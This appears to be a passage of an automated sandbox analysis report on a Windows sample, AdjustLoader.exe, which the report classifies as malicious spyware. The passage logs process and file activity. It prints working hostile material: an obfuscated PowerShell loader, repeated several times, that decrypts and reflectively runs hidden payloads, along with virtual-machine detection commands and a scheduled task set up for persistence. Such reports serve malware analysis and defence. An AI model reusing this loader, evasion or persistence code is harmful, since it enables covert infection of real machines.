Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$nya-onimai3 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$nya-onimai3\$nya-Loli.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$nya-onimai3\$nya-Loli.bat Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_eq4drbh0.jzz.ps1
Detected potential crypto function
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442DCDB8 1_3_00000208442DCDB8
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442D2398 1_3_00000208442D2398
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442DCC34 1_3_00000208442DCC34
Source: C:\Windows\System32\conhost.exe Code function: 2_3_0000020E8B1C2398 2_3_0000020E8B1C2398
Source: C:\Windows\System32\conhost.exe Code function: 2_3_0000020E8B1CCC34 2_3_0000020E8B1CCC34
Source: C:\Windows\System32\conhost.exe Code function: 2_3_0000020E8B1CCDB8 2_3_0000020E8B1CCDB8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD9B7D4070 18_2_00007FFD9B7D4070
Source: C:\Windows\System32\cmd.exe Code function: 21_3_000001CC9145CDB8 21_3_000001CC9145CDB8
Source: C:\Windows\System32\cmd.exe Code function: 21_3_000001CC91452398 21_3_000001CC91452398
Source: C:\Windows\System32\cmd.exe Code function: 21_3_000001CC9145CC34 21_3_000001CC9145CC34
Source: C:\Windows\System32\conhost.exe Code function: 22_3_00000261C3DCCDB8 22_3_00000261C3DCCDB8
Source: C:\Windows\System32\conhost.exe Code function: 22_3_00000261C3DCCC34 22_3_00000261C3DCCC34
Source: C:\Windows\System32\conhost.exe Code function: 22_3_00000261C3DC2398 22_3_00000261C3DC2398
Source: C:\Windows\System32\conhost.exe Code function: 27_3_000002220AB6CC34 27_3_000002220AB6CC34
Source: C:\Windows\System32\conhost.exe Code function: 27_3_000002220AB6CDB8 27_3_000002220AB6CDB8
Source: C:\Windows\System32\conhost.exe Code function: 27_3_000002220AB62398 27_3_000002220AB62398
Source: C:\Windows\System32\conhost.exe Code function: 47_3_0000024D9FF4CC34 47_3_0000024D9FF4CC34
Source: C:\Windows\System32\conhost.exe Code function: 47_3_0000024D9FF42398 47_3_0000024D9FF42398
Source: C:\Windows\System32\conhost.exe Code function: 47_3_0000024D9FF4CDB8 47_3_0000024D9FF4CDB8
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D834 47_2_0000024D9FF7D834
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF72F98 47_2_0000024D9FF72F98
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D9B8 47_2_0000024D9FF7D9B8
Source: C:\Windows\System32\conhost.exe Code function: 54_3_00000123B852CDB8 54_3_00000123B852CDB8
Source: C:\Windows\System32\conhost.exe Code function: 54_3_00000123B8522398 54_3_00000123B8522398
Source: C:\Windows\System32\conhost.exe Code function: 54_3_00000123B852CC34 54_3_00000123B852CC34
Source: C:\Windows\System32\dllhost.exe Code function: 55_3_0000021A20192398 55_3_0000021A20192398
Source: C:\Windows\System32\dllhost.exe Code function: 55_3_0000021A2019CC34 55_3_0000021A2019CC34
Source: C:\Windows\System32\dllhost.exe Code function: 55_3_0000021A2019CDB8 55_3_0000021A2019CDB8
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC64CDB8 56_3_00000225DC64CDB8
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC642398 56_3_00000225DC642398
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC64CC34 56_3_00000225DC64CC34
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC61CDB8 56_3_00000225DC61CDB8
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC612398 56_3_00000225DC612398
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC61CC34 56_3_00000225DC61CC34
Source: C:\Windows\System32\lsass.exe Code function: 57_3_00000202C0AE2398 57_3_00000202C0AE2398
Source: C:\Windows\System32\lsass.exe Code function: 57_3_00000202C0AECC34 57_3_00000202C0AECC34
Source: C:\Windows\System32\lsass.exe Code function: 57_3_00000202C0AECDB8 57_3_00000202C0AECDB8
Source: C:\Windows\System32\svchost.exe Code function: 58_3_000002A661302398 58_3_000002A661302398
Source: C:\Windows\System32\svchost.exe Code function: 58_3_000002A66130CDB8 58_3_000002A66130CDB8
Source: C:\Windows\System32\svchost.exe Code function: 58_3_000002A66130CC34 58_3_000002A66130CC34
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF23CDB8 59_3_000002BAAF23CDB8
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF232398 59_3_000002BAAF232398
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF23CC34 59_3_000002BAAF23CC34
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF1ACDB8 59_3_000002BAAF1ACDB8
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF1A2398 59_3_000002BAAF1A2398
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF1ACC34 59_3_000002BAAF1ACC34
Source: C:\Windows\System32\svchost.exe Code function: 60_3_0000026A8799CC34 60_3_0000026A8799CC34
Source: C:\Windows\System32\svchost.exe Code function: 60_3_0000026A87992398 60_3_0000026A87992398
Source: C:\Windows\System32\svchost.exe Code function: 60_3_0000026A8799CDB8 60_3_0000026A8799CDB8
Source: C:\Windows\System32\svchost.exe Code function: 61_3_000001795377CDB8 61_3_000001795377CDB8
Source: C:\Windows\System32\svchost.exe Code function: 61_3_0000017953772398 61_3_0000017953772398
Source: C:\Windows\System32\svchost.exe Code function: 61_3_000001795377CC34 61_3_000001795377CC34
Source: C:\Windows\System32\svchost.exe Code function: 62_3_000002295D53CDB8 62_3_000002295D53CDB8
Source: C:\Windows\System32\svchost.exe Code function: 62_3_000002295D53CC34 62_3_000002295D53CC34
Source: C:\Windows\System32\svchost.exe Code function: 62_3_000002295D532398 62_3_000002295D532398
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540
PE file does not import any functions
Source: AdjustLoader.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: AdjustLoader.exe, 00000000.00000000.1648948419.000001C8DB03B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUni2.exe* vs AdjustLoader.exe
Source: AdjustLoader.exe Binary or memory string: OriginalFilenameUni2.exe* vs AdjustLoader.exe
Yara signature match
Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5796, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spyw.expl.evad.winEXE@77/37@1/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 51_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 51_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 51_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 51_2_004017A5
Source: C:\Users\user\Desktop\AdjustLoader.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdjustLoader.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\9539513
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\6624292
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\5549515
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\7506200
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\4353117
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1420
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\b9960528-a89f-46d9-ad7e-4161fbe34b93
Source: C:\Users\user\Desktop\AdjustLoader.exe File created: C:\Users\user\AppData\Local\Temp\tmp6432.tmp Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
Source: AdjustLoader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AdjustLoader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AdjustLoader.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.65%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\AdjustLoader.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: AdjustLoader.exe Virustotal: Detection: 20%
Source: unknown Process created: C:\Users\user\Desktop\AdjustLoader.exe "C:\Users\user\Desktop\AdjustLoader.exe"
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2288
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2476
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationF